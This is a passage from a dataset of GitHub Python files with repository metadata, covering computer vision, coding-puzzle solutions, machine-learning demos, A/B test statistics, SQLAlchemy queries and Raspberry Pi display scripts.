interface.edit_idea(idea, request.idea_id)\n except Exception as e:\n return {\"message\": \"error\", \"exception\" : str(e)}","repo_name":"VerseGroup/DevVerse-api","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4966618767","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os.path\nimport sys\n\nfrom collections import namedtuple\n\nfrom colortracker import PointFeatures\n\nimport markerless_heeltoe_detection_naiive\n\nplt.ioff()\n# import PyOpenPose\n\nvideoname = '4farger'\ncache_filename = videoname + '.detections.npy'\n\ntracker = namedtuple('tracker', ['tracker', 'lower_bound', 'upper_bound', 'name'])\n\nif 'cached' in sys.argv and os.path.isfile(cache_filename):\n pointbuffer = np.load(cache_filename)\nelse:\n cap = cv2.VideoCapture('input-videos/' + videoname + '.mp4')\n\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = cap.get(cv2.CAP_PROP_FPS)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(videoname +'.avi', fourcc, fps, (width, height))\n counter = 0\n pointbuffer = []\n\n ret,img=cap.read()\n\n cv2.namedWindow('Keypoints',cv2.WINDOW_NORMAL)\n cv2.resizeWindow('Keypoints', 800,600)\n\n paused = True\n\n t_coords = []\n x_coords = []\n y_coords = []\n\n initMask = np.zeros(img.shape[:2],np.uint8)\n grabMask = np.zeros(img.shape[:2],np.uint8)\n bgdModel = np.zeros((1,65),np.float64)\n fgdModel = np.zeros((1,65),np.float64)\n kernel5 = np.ones((5, 5), np.uint8)\n kernel3 = np.ones((3, 3), np.uint8)\n kernel7 = np.ones((7, 7), np.uint8)\n\n backgroundModel = cv2.createBackgroundSubtractorMOG2()\n\n while (cap.isOpened()):\n\n ret, img = cap.read()\n ret, img = cap.read()\n ret, img = cap.read()\n if ret == True:\n\n mask = backgroundModel.apply(img)\n #mask[np.where(mask == 127)] = 0\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel3)\n #mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel3)\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel5)\n cv2.imshow('Keypoints',mask)\n\n if paused:\n delay = 0\n else:\n delay = 1\n\n pressed_key = cv2.waitKey(delay) & 0xFF\n if pressed_key == ord(' '):\n paused = not paused\n elif pressed_key == ord('q'):\n break\n else:\n break\n counter += 1\n counter = 0\n cap.set(cv2.CAP_PROP_POS_FRAMES, 0)\n while (cap.isOpened()):#\n\n ret, img = cap.read()\n if ret == True:\n\n mask = backgroundModel.apply(img)\n #mask[np.where(mask == 127)] = 0\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel3)\n #mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel3)\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel7)\n # grabMask, bgdModel, fgdModel = cv2.grabCut(img,mask,None,bgdModel,fgdModel,5,cv2.GC_INIT_WITH_MASK)\n\n # Remove blobs < min_size\n #nb, output, stats, centroids = cv2.connectedComponentsWithStats(mask, connectivity=8)\n #sizes = stats[1:, -1]; nb = nb - 1\n #min_size = 6400\n #img = np.zeros((output.shape))\n #for i in range(0, nb):\n # if sizes[i] >= min_size:\n # img[output == i + 1] = 255\n #mask = img\n\n cv2.imshow('Keypoints',mask)\n markerless_heeltoe_detection_naiive.get_heeltoe(mask)\n\n if paused:\n delay = 0\n else:\n delay = 1\n\n pressed_key = cv2.waitKey(delay) & 0xFF\n if pressed_key == ord(' '):\n paused = not paused\n elif pressed_key == ord('q'):\n break\n else:\n break\n counter += 1\n\n # Release everything if job is finished\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n\n\n\ndef extract_position_square(item):\n return item.position[0] ** 2 + item.position[1] ** 2\n\n\n# position_variances = [np.var(list(map(extract_position_square, s))) for s in pointString]\n# plt.plot(np.log(position_variances), 'o')\n# plt.show()\n\n#pointString = [s for s in pointString if len(s) > 10]\n\nf, axes = plt.subplots(ncols=2)\n\nfor index in range(0, len(pointbuffer)):\n curve = pointbuffer[index]\n t_c=curve[2]\n x_c=curve[0]\n y_c=curve[1]\n xline = axes[0].plot(t_c, x_c, 'o-', markersize=2)\n yline = axes[1].plot(t_c, y_c, 'o-', markersize=2)\n\naxes[1].invert_yaxis()\n#plt.show()\n\n\n\n#img = cv2.imread('messi5.jpg')\n#mask = np.zeros(img.shape[:2],np.uint8)\n#bgdModel = np.zeros((1,65),np.float64)\n#fgdModel = np.zeros((1,65),np.float64)\n#rect = (50,50,450,290)\n#newmask = cv2.imread('newmask.png',0)\n# whereever it is marked white (sure foreground), change mask=1\n# whereever it is marked black (sure background), change mask=0\n#mask[newmask == 0] = 0\n#mask[newmask == 255] = 1\n#mask, bgdModel, fgdModel = cv2.grabCut(img,mask,None,bgdModel,fgdModel,5,cv2.GC_INIT_WITH_MASK)\n#mask = np.where((mask==2)|(mask==0),0,1).astype('uint8')\n#img = img*mask[:,:,np.newaxis]\n#plt.imshow(img),plt.colorbar(),plt.show()\n\nprint('You did the thing :)')\n\n","repo_name":"gait-cdio/gait","sub_path":"test_segmentation.py","file_name":"test_segmentation.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"20289733105","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n listALength = 0\n listBLength = 0\n a = headA\n b = headB\n while a is not None:\n listALength += 1\n a = a.next\n\n while b is not None:\n listBLength += 1\n b = b.next\n\n diff = abs(listALength - listBLength)\n\n if listALength > listBLength:\n while diff > 0:\n headA = headA.next\n diff -= 1\n elif listALength < listBLength:\n while diff > 0:\n headB = headB.next\n diff -= 1\n\n while headA is not None and headB is not None:\n if headA == headB:\n return headA\n else:\n headA = headA.next\n headB = headB.next\n\n return None\n","repo_name":"h74zhou/leetcode","sub_path":"Easy/160. Intersection of Two Linked Lists.py","file_name":"160. Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5162437314","text":"#!/usr/bin/env python3\n\ndata = open(\"input.txt\", \"r\").readlines()#.read().split('\\n\\n')\n\n# SOS otan exw range(x,x) tote prokiptei empty set kai i sinthiki pou exw tha isxei enw den prepei! -> range(x,x+1)!\ncount = 0\n# for i in range(0, len(data), 1):\nfor d in data:\n pair = d.strip('\\n').split(',') # ['2-4', '6-8']\n # print(pair)\n elf1_sections, elf2_sections = pair[0], pair[1] # 2-4, 6-8\n # section range for 1st elf\n elf1_start, elf1_end = elf1_sections.split('-')\n elf1_start, elf1_end = int(elf1_start), int(elf1_end) \n elf1_range = range(elf1_start, elf1_end + 1) # range is not inclusive!\n # print(\"elf1 range\", elf1_range)\n # section range for 2nd elf\n elf2_start, elf2_end = elf2_sections.split('-')\n elf2_start, elf2_end = int(elf2_start), int(elf2_end) \n elf2_range = range(elf2_start, elf2_end + 1)\n # print(\"elf2 range\", elf2_range)\n\n if set(elf1_range).issubset(elf2_range) or set(elf2_range).issubset(elf1_range):\n count += 1\n\nprint(\"Count:\", count)\n","repo_name":"kpetrakis/advent-of-code-2022","sub_path":"4/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17420301944","text":"import tensorflow as tf\n\n__all__ = ['saliency_grad']\n\n\ndef saliency_grad(inputs, logits, saliency_class):\n logits_cls = logits[:, saliency_class]\n target = tf.reduce_mean(logits_cls, axis=0)\n grads = tf.gradients(target, [inputs])[0]\n grads /= (tf.sqrt(tf.reduce_mean(tf.square(grads))) + 1e-5)\n return grads\n","repo_name":"ylgao1/tfutil","sub_path":"tfutil/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35149572864","text":"'''\nhttps://www.practicepython.org/exercise/2014/12/14/23-file-overlap.html\n23 - File Overlap\nGiven two .txt files that have lists of numbers in them, find the numbers that are overlapping. \nOne .txt file has a list of all prime numbers under 1000, and the other .txt file has a list of happy numbers up to 1000.\n\n(If you forgot, prime numbers are numbers that can’t be divided by any other number. \nAnd yes, happy numbers are a real thing in mathematics - you can look it up on Wikipedia).\n'''\ndef filetolist(fn):\n return_list = list()\n fh = open(fn)\n for line in fh:\n # line = line.rstrip()\n return_list.append(int(line))\n return return_list\n\nprime_list = filetolist(\"primenumbers.txt\")\nhappy_list = filetolist(\"happynumbers.txt\")\n\nprint([elem for elem in prime_list if elem in happy_list])\n","repo_name":"princekumar036/py-practicepython.org","sub_path":"23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32183570799","text":"from linear_model.perceptron import PerceptronWithHistory, PerceptronWithPocket, PerceptronWithPocketAndHistory\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\n\nimport matplotlib\nmatplotlib.rcParams[\"backend\"] = \"TkAgg\"\n\n\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\n # setup marker generator and color map\n markers = ('s', 'x', 'o', '^', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict_all(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n\n # plot class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0],\n y=X[y == cl, 1],\n alpha=0.8,\n c=colors[idx],\n marker=markers[idx],\n label=cl,\n edgecolor='black')\n\n\ndef download_setosa():\n df = pd.read_csv('https://raw.githubusercontent.com/pandas-dev/pandas/master/pandas/tests/data/iris.csv')\n df_virginica = df[df['Name'] == 'Iris-virginica']\n df_setosa = df[df['Name'] == 'Iris-setosa']\n df_versicolor = df[df['Name'] == 'Iris-versicolor']\n\n return df_virginica, df_setosa, df_versicolor\n\ndef plots():\n virginica, setosa, versicolor = download_setosa()\n\n versicolor_2d = versicolor.iloc[:, [0, 2]].values\n virginica_2d = virginica.iloc[:, [0, 2]].values\n setosa_2d = setosa.iloc[:, [0, 2]].values\n\n plt.scatter(virginica_2d[:, 0], virginica_2d[:, 1], label='virginica')\n plt.scatter(setosa_2d[:, 0], setosa_2d[:, 1], label='setosa')\n plt.legend(loc='upper left')\n plt.draw()\n\n\n X = np.concatenate((virginica_2d, setosa_2d))\n y = np.concatenate((np.repeat(1., len(virginica_2d)), np.repeat(-1., len(virginica_2d))))\n\n p = PerceptronWithHistory()\n errors = p.fit(X, y)\n\n plt.figure()\n plt.plot(errors)\n plt.xlabel('iteration')\n plt.ylabel('error rate')\n plt.draw()\n\n print(errors)\n\n plt.figure()\n plot_decision_regions(X, y, classifier=p)\n plt.xlabel('sepal length [cm]')\n plt.ylabel('petal length [cm]')\n plt.legend(loc='upper left')\n\n\n plt.show()\n\ndef generalization():\n virginica, setosa, versicolor = download_setosa()\n virginica_x = virginica.iloc[:-5, :4].values\n versicolor_x = versicolor.iloc[:-5, :4].values\n X = np.concatenate(( virginica_x, versicolor_x ))\n y = np.concatenate((np.repeat(1., len(virginica_x)), np.repeat(-1., len(versicolor_x))))\n\n p = PerceptronWithPocketAndHistory(0.1)\n errors = p.fit(X, y)\n\n plt.figure()\n plt.plot(errors)\n plt.xlabel('iteration')\n plt.ylabel('error rate')\n plt.draw()\n\n virginica_vefiry = virginica.iloc[-5:, :4].values\n versicolor_verify = versicolor.iloc[-5:, :4].values\n X_verify = np.concatenate(( virginica_vefiry, versicolor_verify ))\n y_verify = np.concatenate((np.repeat(1., len(virginica_vefiry)), np.repeat(-1., len(versicolor_verify))))\n\n predicted = p.predict_all(X_verify)\n error = p.get_error(X_verify, y_verify)\n\n print(y_verify, predicted)\n print(error, p.best_error)\n\n plt.show()\n\n\n\n\ngeneralization()","repo_name":"MarcinGodniak/python-ml","sub_path":"linear_model/examples/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13896754425","text":"#H0: M1 =M2 average bidding ve maximum bidding dönüşümlerinin ortalamaları arasında anlamlı fark yoktur.\r\n#H1: ... anlanmlı bir fark vardır.\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport statsmodels.stats.api as sms\r\nfrom scipy.stats import ttest_1samp, shapiro, levene, ttest_ind, mannwhitneyu, pearsonr, spearmanr, kendalltau, \\\r\n f_oneway, kruskal\r\nfrom statsmodels.stats.proportion import proportions_ztest\r\n\r\npd.set_option('display.max_columns', None)\r\npd.set_option('display.max_rows', 10)\r\npd.set_option('display.float_format', lambda x: '%.5f' % x)\r\n\r\ndf = pd.read_excel(\"ab_testing.xlsx\")\r\nControl_df = pd.read_excel(\"ab_testing.xlsx\", sheet_name=\"Control Group\")\r\nTest_df = pd.read_excel(\"ab_testing.xlsx\", sheet_name=\"Test Group\")\r\n\r\nControl_df.describe().T\r\nTest_df.describe().T\r\n\r\nsms.DescrStatsW(Control_df[\"Purchase\"]).tconfint_mean()\r\nsms.DescrStatsW(Test_df[\"Purchase\"]).tconfint_mean()\r\n\r\nControl_df[\"Purchase\"].mean()\r\nTest_df[\"Purchase\"].mean()\r\n\r\n#H0: M1 =M2 average bidding ve maximum bidding dönüşümlerinin ortalamaları arasında anlamlı fark yoktur.\r\n#H1: ... anlanmlı bir fark vardır.\r\n\r\n#İlk olarak normallik varsayımı için shapiro-wilk testi yapılır.\r\n\r\ntest_stat, pvalue = shapiro(Control_df[\"Purchase\"])\r\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\r\n#p-value>0.05 olduğundan HO Reddedilemez, anlamlı fark yoktur\r\n\r\ntest_stat, pvalue = shapiro(Test_df[\"Purchase\"])\r\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\r\n#p-value>0.05 olduğundan HO Reddedilemez, anlamlı fark yoktur.\r\n\r\n# Varyans Homojenligi Varsayımı\r\n# H0: Varyanslar Homojendir\r\n# H1: Varyanslar Homojen Değildir\r\n\r\ntest_stat, pvalue = levene(Control_df[\"Purchase\"],\r\n Test_df[\"Purchase\"])\r\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\r\n#p-value>0.05 olduğundan HO reddedilemez. Varyanslar homojendir.\r\n\r\n# Varsayımlar sağlanıyorsa bağımsız iki örneklem t testi (parametrik test)\r\n\r\ntest_stat, pvalue = ttest_ind(Control_df[\"Purchase\"],\r\n Test_df[\"Purchase\"],\r\n equal_var=True)\r\n\r\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\r\n#p-value>0.05 olduğundan H0 reddedilemez. %95 güven aralığında Average bidding ve maximum bidding dönüşümlerinin ortalamaları\r\n#arasında anlamlı fark yoktur.\r\n\r\n\r\n######## KULLANILAN TESTLER #########\r\n# İlk olarak normallik varsayımı için Shapiro-Wilk testini her iki grup için de ayrı ayrı kullandık.\r\n# Ardından bu test sonuçları H0 reddedilemez çıkınca yani normal dağılıma uygun olduğu görüldü.\r\n# Eğer H0 red çıksaydı veriler normal dağılıma uygun değil diyip non-parametrik testlerden mann-whitney'e geçecektik.\r\n# Ancak normal dağılıma uygun olduğundan varyansların homojenliği için levene testi kullanıldı.\r\n# levene testinde varyanslar homojen çıktı.\r\n# En son bağımsız iki örneklem t testini yaparak H0 hipotezi reddedilemez sonucuna ulaştık. Burada equal_var=True\r\n# yani varyanslar eşit seçildi, eğer levene testinde H0 red çıksaydı equal_var=False olarak yine t testi yapılacaktı.\r\n\r\n\r\n######## YORUMLAR ##########\r\n# %95 güven aralığı ile average bidding ve maximum bidding satınalınan ürün sayıları arasında istatistiksel olarak\r\n#anlamlı bir fark yoktur. Yeni yöntemin uygulandığında elimizdeki mevcut verilerle bu yöntemin satınalma sayısını artırdığından\r\n#söz edemeyiz. Güven aralıkları değerlerine baktığımızda %95 güven aralığında test veri setindeki purchase değerlerinin 530-633 arasında\r\n#olduğunu, control veri seti purchase değerlerinin 508-593 değerleri arasında olduğunu söyleyebiliriz. Bu değerlere\r\n#bakıldığında test veri setindeki purchase değerlerinin daha yüksek olduğunu söyleyebiliriz ancak bu sette standart sapma da, aralık da\r\n#daha yüksektir. Bu sebeple yeni yöntemin fazla satınalma getirmesini istatistiki açıdan destekleyen bir kanıt yoktur,\r\n#tesadufi olabilir, daha uzun süre daha fazla veri ile tekrar gözlemlenebilir.\r\n\r\n","repo_name":"ceyhanmerve/AB-Testing","sub_path":"proje_AB_testing.py","file_name":"proje_AB_testing.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30248847325","text":"#strategy to solve the problem\n #goal: return the length of the longest substring container the same letter after perform k replacement in that substring\n\n #why:\n #we want the length of longest substring, therefore one possible strategy is sliding window\n #sliding window will try to reach longest substring but we need condition so that it is valid solution\n #we need to know the most comment char and then check is it valid solution if it is not a valid, we update left pointer to check another solution\n #the key is that we also need to update char_counter before we move left pointer\n\n #find the current max_char by compare the past max_char with the current char count in question\n #it is a valid repeat substring with k replace if total_char (r-l+1) - max_char > k\n\n #variable:\n #max_char, total_char (int): for each iteration we need to keep track of the current maxium char and total char in the window to decide is this substring a valid repeat substring\n #l, r (int): to keep track of left and right pointer of the current window\n # res (int): to search for the length of longest substring\n#########################reference solution\nfrom collections import Counter, defaultdict\nclass Solution:\n def characterReplacement(self, s: str, k: int) -> int:\n res = 0\n l = 0\n char_counter = defaultdict(int)\n for r in range(len(s)):\n char_counter[s[r]] += 1\n if (r-l+1) - max(char_counter.values()) > k:\n char_counter[s[l]] = char_counter[s[l]] - 1\n l += 1\n \n res = max(res, r-l+1)\n return res\n \n#############################reference solution\nclass Solution:\n def characterReplacement(self, s: str, k: int) -> int:\n char_counter = Counter()\n l, res = 0, 0\n max_char = 0\n for r in range(len(s)):\n char_counter[s[r]] += 1\n max_char = max(max_char, char_counter[s[r]])\n total_char = r-l+1\n if total_char - max_char > k:\n char_counter[s[l]] -= 1\n l += 1\n else:\n res = max(res, total_char)\n return res\n ","repo_name":"toanbui626391/data_structure_algorithm","sub_path":"sliding_window/char_replacement.py","file_name":"char_replacement.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21004476780","text":"#!/usr/bin/env python\n\nimport time\nimport fourletterphat\nfrom subprocess import Popen, PIPE\n\nprint(\"\"\"\nFour Letter pHAT: cpu-temp.py\n\nThis example will display your Pi's CPU\ntemperature in degrees celsius.\n\nPress Ctrl+C to exit.\n\"\"\")\n\n\nwhile True:\n # Get temp forom vcgencmd in the format: \"temp=XY.Z'C\"\n # and reduce to the format \"XYZC\" for display\n temperature = Popen([\"vcgencmd\", \"measure_temp\"], stdout=PIPE)\n temperature = temperature.stdout.read().decode('utf-8')\n\n # Rempve \"temp=\" and the \".\" and \"'\" chars\n temperature = temperature[5:].replace(\".\", \"\").replace(\"'\", \"\").strip()\n\n fourletterphat.clear()\n fourletterphat.print_str(temperature)\n fourletterphat.set_decimal(1, 1)\n fourletterphat.show()\n\n time.sleep(1)\n\n","repo_name":"pimoroni/fourletter-phat","sub_path":"examples/cpu-temp.py","file_name":"cpu-temp.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"7"} +{"seq_id":"15201170643","text":"import sys\nfrom pathlib import Path\nfrom typing import Optional, List\n\nimport numpy as np\nimport pyrallis\nimport torch\nfrom PIL import Image\nfrom dataclasses import dataclass\nfrom tqdm import tqdm\n\nsys.path.append(\".\")\nsys.path.append(\"..\")\n\nfrom configs.paths_config import model_paths\nfrom models.stylegan3.model import SG3Generator\nfrom models.stylegan3.networks_stylegan3 import Generator\nfrom utils.common import tensor2im, generate_mp4\n\n\nRESIZE_AMOUNT = (1024, 1024)\nN_TRANSITIONS = 25\nSIZE = RESIZE_AMOUNT[0]\n\n\n@dataclass\nclass RunConfig:\n # Where to save the animations\n output_path: Path\n # Path to directory of images to add to the animation\n data_path: Path\n # Path to `npy` file containing the inverted latents\n latents_path: Path\n # Path to StyleGAN3 generator\n generator_path: Path = Path(model_paths[\"stylegan3_ffhq\"])\n # Path to `npy` with the transformations used for generating the unaligned images\n landmarks_transforms_path: Optional[Path] = None\n # Number of images to include in animation. If None, run on all data\n n_images: Optional[int] = None\n # Fps of the generated animations\n fps: int = 15\n\n\n@pyrallis.wrap()\ndef main(opts: RunConfig):\n decoder = SG3Generator(checkpoint_path=opts.generator_path).decoder\n\n latents = np.load(opts.latents_path, allow_pickle=True).item()\n landmarks_transforms = np.load(opts.landmarks_transforms_path, allow_pickle=True).item()\n image_names = list(latents.keys())\n if opts.n_images is not None:\n image_names = np.random.choice(image_names, size=opts.n_images, replace=False)\n image_paths = [opts.data_path / image_name for image_name in image_names]\n\n in_images = []\n all_vecs = []\n all_landmarks_transforms = []\n for image_path in image_paths:\n print(f'Working on {image_path.name}...')\n original_image = Image.open(image_path).convert(\"RGB\")\n latent = latents[image_path.name][-1]\n landmark_transform = landmarks_transforms[image_path.name][-1]\n all_vecs.append([latent])\n all_landmarks_transforms.append(landmark_transform)\n in_images.append(original_image.resize(RESIZE_AMOUNT))\n\n image_paths.append(image_paths[0])\n all_vecs.append(all_vecs[0])\n all_landmarks_transforms.append(all_landmarks_transforms[0])\n in_images.append(in_images[0])\n\n all_images = []\n for i in range(1, len(image_paths)):\n if i == 0:\n alpha_vals = [0] * 10 + np.linspace(0, 1, N_TRANSITIONS).tolist() + [1] * 5\n else:\n alpha_vals = [0] * 5 + np.linspace(0, 1, N_TRANSITIONS).tolist() + [1] * 5\n\n for alpha in tqdm(alpha_vals):\n image_a = np.array(in_images[i - 1])\n image_b = np.array(in_images[i])\n image_joint = np.zeros_like(image_a)\n up_to_row = int((SIZE - 1) * alpha)\n if up_to_row > 0:\n image_joint[:(up_to_row + 1), :, :] = image_b[((SIZE - 1) - up_to_row):, :, :]\n if up_to_row < (SIZE - 1):\n image_joint[up_to_row:, :, :] = image_a[:(SIZE - up_to_row), :, :]\n\n result_image = get_result_from_vecs(decoder,\n all_vecs[i - 1], all_vecs[i],\n all_landmarks_transforms[i - 1], all_landmarks_transforms[i],\n alpha)[0]\n\n output_im = tensor2im(result_image)\n res = np.concatenate([image_joint, np.array(output_im)], axis=1)\n all_images.append(res)\n\n kwargs = {'fps': opts.fps}\n opts.output_path.mkdir(exist_ok=True, parents=True)\n gif_path = opts.output_path / f\"inversions_gif\"\n generate_mp4(gif_path, all_images, kwargs)\n\n\ndef get_result_from_vecs(generator: Generator, vectors_a: List[np.ndarray], vectors_b: List[np.ndarray],\n landmarks_a: np.ndarray, landmarks_b: np.ndarray, alpha: float):\n results = []\n for i in range(len(vectors_a)):\n with torch.no_grad():\n cur_vec = vectors_b[i] * alpha + vectors_a[i] * (1 - alpha)\n landmarks_transform = landmarks_b * alpha + landmarks_a * (1 - alpha)\n generator.synthesis.input.transform = torch.from_numpy(landmarks_transform).float().cuda().unsqueeze(0)\n res = generator.synthesis(torch.from_numpy(cur_vec).cuda().unsqueeze(0), noise_mode='const', force_fp32=True)\n results.append(res[0])\n return results\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yuval-alaluf/stylegan3-editing","sub_path":"inversion/scripts/create_inversion_animation.py","file_name":"create_inversion_animation.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":622,"dataset":"github-code","pt":"79"} +{"seq_id":"73791857215","text":"# import codecademylib\nfrom matplotlib import pyplot as plt\n\nmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n\nvisits_per_month = [9695, 7909, 10831, 12942, 12495, 16794, 14161, 12762, 12777, 12439, 10309, 8724]\n\n# numbers of limes of different species sold each month\nkey_limes_per_month = [92.0, 109.0, 124.0, 70.0, 101.0, 79.0, 106.0, 101.0, 103.0, 90.0, 102.0, 106.0]\npersian_limes_per_month = [67.0, 51.0, 57.0, 54.0, 83.0, 90.0, 52.0, 63.0, 51.0, 44.0, 64.0, 78.0]\nblood_limes_per_month = [75.0, 75.0, 76.0, 71.0, 74.0, 77.0, 69.0, 80.0, 63.0, 69.0, 73.0, 82.0]\n\n\n# create your figure here\nplt.figure(figsize=(12, 8))\nax1 = plt.subplot(1, 2, 1)\nx_values = range(len(months))\nplt.plot(x_values, visits_per_month, marker='o')\nplt.xlabel('Months')\nplt.ylabel('Number of visits')\nax1.set_xticks(x_values)\nax1.set_xticklabels(months)\nplt.title('Title 1')\n\nax2 = plt.subplot(1, 2, 2)\nplt.plot(x_values, key_limes_per_month, marker='*', color='blue')\nplt.plot(x_values, persian_limes_per_month, marker='*', color='pink')\nplt.plot(x_values, blood_limes_per_month, marker='*', color='green')\nlegend_limes = ['Key Limes', 'Persian Limes', 'Blood Limes']\nplt.legend(legend_limes, loc=8)\nplt.xlabel('Months')\nplt.ylabel('Number of visits')\nax1.set_xticks(x_values)\nax1.set_xticklabels(months)\nplt.legend(legend_limes)\nplt.title('Title 2')\n\nplt.show()\n","repo_name":"Bharadwaja92/DataScienceProjects","sub_path":"Visualization/Matplotlib/SublimeLimes/LimePlots.py","file_name":"LimePlots.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27672298469","text":"import pandas\nfrom sklearn import linear_model\n\ndf = pandas.read_csv(\"housepricedata.csv\")\n\nY = df[[\"SalePrice\"]]\nY = Y.head(100)\n\nX = df[[\"LotArea\", \"OverallCond\", \"YearBuilt\"]]\nX = X.head(100)\n\nreg = linear_model.LinearRegression()\nreg.fit(X, Y)\n\nprint(reg.predict([[8450, 7, 2002]]))\n\n\n\n\n\n","repo_name":"wheatgreaser/House-Price-Predictinator","sub_path":"housepricepredictinator.py","file_name":"housepricepredictinator.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33161544819","text":"#!/usr/bin/python3\n\"\"\"lists states and cities from the database using orm\"\"\"\n\nfrom sys import argv\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\nfrom relationship_state import Base, State\nfrom relationship_city import City\n\nif __name__ == \"__main__\":\n \"\"\"lists states from the database using orm\"\"\"\n uri = 'mysql+mysqldb://{}:{}@localhost:3306/{}'.format(\n argv[1], argv[2], argv[3])\n engine = create_engine(uri, pool_pre_ping=True)\n\n Base.metadata.create_all(engine)\n Sesh = sessionmaker(bind=engine)\n sesh = Sesh()\n data = sesh.query(State).order_by(State.id).all()\n for item in data:\n print(\"{}: {}\".format(item.id, item.name))\n for elem in item.cities:\n print(\"{}{}: {}\".format(\" \"*4, elem.id, elem.name))\n\n sesh.close()\n","repo_name":"Raytchellee/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/101-relationship_states_cities_list.py","file_name":"101-relationship_states_cities_list.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30723280326","text":"def find_letter(A, B):\n for A_index, A_char in enumerate(A):\n for B_index, B_char in enumerate(B):\n if A_char == B_char:\n return A_index, B_index\n\ndef main():\n A, B = input().split()\n\n A_index, B_index = find_letter(A, B)\n\n for i in range(len(B)):\n if i == B_index:\n print(A)\n else:\n print('.' * A_index + B[i] + '.' * (len(A) - A_index - 1))\n \nmain()\n","repo_name":"BenRStutzman/kattis","sub_path":"Open Kattis/krizaljka.py","file_name":"krizaljka.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71321783616","text":"import tensorflow as tf\nfrom tensorflow import keras\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfashion_mnist = keras.datasets.fashion_mnist\n\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\nplt.figure()\nplt.imshow(train_images[0])\nplt.colorbar()\nplt.grid(False)\nplt.show()\n\nplt.figure(figsize=(10, 10))\nfor i in range(25):\n 